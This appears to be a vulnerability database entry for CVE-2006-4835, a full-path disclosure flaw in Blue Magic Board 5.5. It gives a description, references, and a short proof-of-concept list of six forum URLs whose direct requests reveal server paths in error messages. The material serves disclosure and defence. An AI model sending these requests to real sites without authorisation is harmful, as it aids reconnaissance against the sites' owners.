Bluview Blue Magic Board Multiple Sensitive Information Disclosure Vulnerabilities

Vulnerability ID 1193483 Vulnerability type Unknown
Published 2006-09-15 Updated 2006-09-15
CVE ID CVE-2006-4835 CNNVD-ID CNNVD-200609-276
Platform N/A CVSS score 5.0
|Vulnerability source
https://www.securityfocus.com/bid/84183
https://cxsecurity.com/issue/WLB-2006090114
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-276
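|Vulnerability details
Bluview Blue Magic Board (BMB) (also known as BMForum) 5.5 allows remote attackers to obtain sensitive information via a direct request to (1) footer.php, (2) header.php, (3) db_mysql_error.php, (4) langlist.php, (5) sendmail.php, or (6) style.php, which reveals the path in various error messages.
|Vulnerability EXP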
Blue Magic Board (BMB) is a nice forum system written by http://bmforum.com

Some files error out and show the full path. I tested the newest version; maybe all older versions are infected.

http://domain.ext/[bmb_path]/footer.php

http://domain.ext/[bmb_path]/header.php

http://domain.ext/[bmb_path]/include/db/db_mysql_error.php

http://domain.ext/[bmb_path]/datafile/langlist.php

http://domain.ext/[bmb_path]/datafile/sendmail.php

http://domain.ext/[bmb_path]/datafile/style.php

This was reported to the admin, but I haven't received a reply yet.
|Affected products
Bluview Blue Magic Board 5.5
|References

Source: BUGTRAQ
Name: 20060914 Fullpath disclosure in Blue Magic Board 5.5
Link: http://www.securityfocus.com/archive/1/archive/1/446037/100/0/threaded
Source: XF
Name: bluemagicboard-footer-path-disclosure(28949)
Link: http://xforce.iss.net/xforce/xfdb/28949
Source: SREASON
Name: 1586
Link: http://securityreason.com/securityalert/1586